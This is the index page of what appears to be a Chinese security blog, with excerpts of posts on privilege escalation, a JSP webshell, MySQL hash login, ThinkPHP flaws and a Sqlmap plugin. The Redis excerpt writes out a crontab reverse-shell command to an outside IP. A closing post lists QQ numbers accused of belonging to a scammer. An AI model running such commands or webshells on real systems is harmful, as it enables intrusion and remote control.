redis利用姿势收集

分类:安全 | 2016-09-25 | 撸过 480 次
0人扯谈

redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面;

测试环境:CentOS,RHEL

# 利用crontab反弹shell

redis-cli flushall 
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1 
redis-cli config set dir[......]

继续阅读

Linux_Exploit_Suggester — Linux下提权辅助工具

分类:安全 | 2016-09-24 | 撸过 135 次
0人扯谈

Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具,如果不带任何参数运行该脚本的话,将执行uname -r返回的操作系统发行版本,或者手工输入-k参数查找指定版本号。

例子:

$ perl ./Linux_Exploit_Suggester.pl -k 3.0.0

Kernel local: 3.0.0

Possible Exploits:
[+] semtex
   CVE-2013-2094
   Source: www.exploit-db.com/download/25444/‎
[+] memodipper[......]

继续阅读

Windows-Exploit-Suggester — Windows下提权辅助工具

分类:安全 | 2016-09-24 | 撸过 177 次
0人扯谈

此工具是一款非常好用的Windows下提权辅助工具(已经支持Windows 10下的提权了),国内已经有许多人在用了,但是一直没有相应的中文文档,所以我特地翻译了一下,水平有限,如有错误,欢迎指出,谢谢。

描述

该工具可以将目标系统的补丁安装情况与微软的漏洞数据库进行对比,进而检测出目标系统中潜在的未修复漏洞。同时此工具还会告知用户针对于此漏洞是否有公开的exp和可用的Metasploit模块。

同时它可以使用–update参数去自动化地从微软下载漏洞补丁数据库,并将其以Excel表格的形式保存。

需要注意的是,此工具首先会假定目标系统存在所有漏洞,然后再基于系统补丁情[……]

继续阅读

MYSQL提权总结

分类:安全 | 2016-07-16 | 撸过 2,284 次
0人扯谈

最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。
一、利用mof提权

前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day),剑心牛对MOF利用进行了分析,如下:
Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式[……]

继续阅读

菜刀Jsp脚本增强版

分类:安全 | 2016-07-14 | 撸过 1,309 次
3人扯谈

某些朋友需求,这里简单的修改了下菜刀原作者的JSP脚本。主要是修复了一些BUG和代码优化,新增了查询自定义备份功能。
 
修复BUG:
 
1、初始化获取容器绝对路径错误如:原本路径是D:\wooyun菜刀连接默认跳转到了:D:\wooyun\wooyun目录。
2、修改了无法连接Oracle数据库问题
3、修改了远程下载代码
4、重新压了下代码

 

新的服务器端代码如下:
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>[......]

继续阅读

BurpSuite集成Sqlmap神器!

分类:工具 | 2016-06-30 | 撸过 1,513 次
0人扯谈

设置很简单,这个已经是编译好的,只要在:extender–>extentions–>add 添加jar就OK了!

不过需要BurpSuite需要放到sqlmap根目录下!

本插件实现原理:

将目标请求的数据存放到临时文件中,然后调用"sqlmap.py -r $file"来启动对请求的sql注入检测 在Sqlmap tab中,你可以配置sqlmap除 -r外的其他参数,比如:
加入配置中写:"--level 3",真实执行时是:sqlmap.py -r $file --level 3
回到burpsuite主页面,在任何请求连接上右键,会看到新增"send to Sqlmap",点击后会开启cmd窗口,针对此请求进行sql注入检测

设置sqlmap参数:
[……]

继续阅读

韩国挫败了朝鲜黑客大规模网络攻击

分类:新闻 | 2016-06-29 | 撸过 648 次
0人扯谈

最近的一份报告显示,朝鲜黑客入侵了超过160个韩国政府机构和企业的14万台计算机,并涉嫌在系统中种植了恶意软件,为其大规模的网络攻击做准备。

韩国调查朝鲜黑客行为

路透社报道,韩国警方对朝鲜黑客的网络攻击行为一直保持高度警戒,特别是朝鲜在1,2月份进行小型化氢弹试验和远程火箭试验之后。

韩国警察厅网络调查科表示,警方获得恶意代码情报之后展开了调查,结果发现一些大型企业,公共组织和政府机构在内的160多个机构使用的一款网络管理软件被朝鲜黑客攻破。该网络管理软件是由一家民间企业开发的,通过该系统,管理员可以远程操控多台电脑,统一进行软件升级和维护。而朝鲜黑客发现了这套系统中的漏洞[……]

继续阅读

免密码hash登陆mysql

分类:工具 | 2016-06-28 | 撸过 864 次
0人扯谈

在获取到mysql用户的hash后,
可用hash直接登陆mysql进行操作
比如我们注入出数据库的hash,但是没办法拿到webshell
我们可以使用mysql_hash,用hash登陆并控制数据库
使用方法:
mysql_hash.exe -u root -p < 1.txt
Enter password: *****************************************
其中1.txt在同目录,内容为你想执行的sql语句,
比如:show databases;

[……]

继续阅读

Thinkphp 漏洞小结

分类:安全 | 2016-06-14 | 撸过 1,830 次
5人扯谈

首先确定这个网站使用thinkphp的框架

国内很多php开源项目的代码都是使用thinkphp框架编写的,但是thinkphp框架有很多版本,如何才能知道我们使用的框架是哪个版本的呢?

在URL后面加thinkphp的目录,也有可能爆出来

这是一个tankphp的网站目录。供参考

  • admin是后台工程文件夹
  • home是前台工程
  • public里面用于存放CSS文件,JS文件以及网页里面的图片
  • ThinkPHP框架
  • ueditor是百度编辑器

ThinkPHP的Ubb标签漏洞读取任意内容

http://w[……]

继续阅读

实力骗子,请吃瓜群众围观!

分类:安全 | 2015-09-9 | 撸过 1,047 次
0人扯谈

此骗子我不想多说只想给他一个单独的页面不为啥我崇拜他的跑单技术!

 

 

这人以前就有“光荣”的记录!

 

1660416619 1577758878 1691989898 986388338
2528808204
1952209234
1577758878 1691989898 986388338
2528808204
515075407
9722149
1140500191
以上都是骗子的qq 厉害吧 骗我不多 就是几千块 可是终于被我查到骗子的qq了 希望以后别被骗 他是专门 卖网站的

 

[……]

继续阅读

第 1 页,共 68 页12345...102030...最旧 »